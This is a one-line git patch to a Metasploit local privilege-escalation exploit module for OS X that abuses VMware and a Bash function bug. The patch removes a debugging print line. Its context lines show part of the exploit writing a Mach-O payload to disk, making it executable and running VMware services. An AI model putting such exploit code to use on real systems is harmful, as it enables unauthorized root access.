From f13289ab656f367b33e836a4e1b27004aebe4d31 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Thu, 25 Sep 2014 02:16:19 -0400 Subject: [PATCH] remove debugging --- modules/exploits/osx/local/vmware_bash_function_root.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index ef1c3d342d..0e8f021e96 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -72,7 +72,6 @@ class Metasploit3 < Msf::Exploit::Local exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) write_file(payload_file, exe) register_file_for_cleanup(payload_file) - print_status("Got here") cmd_exec("chmod +x #{payload_file}") print_status("Running VMWare services...")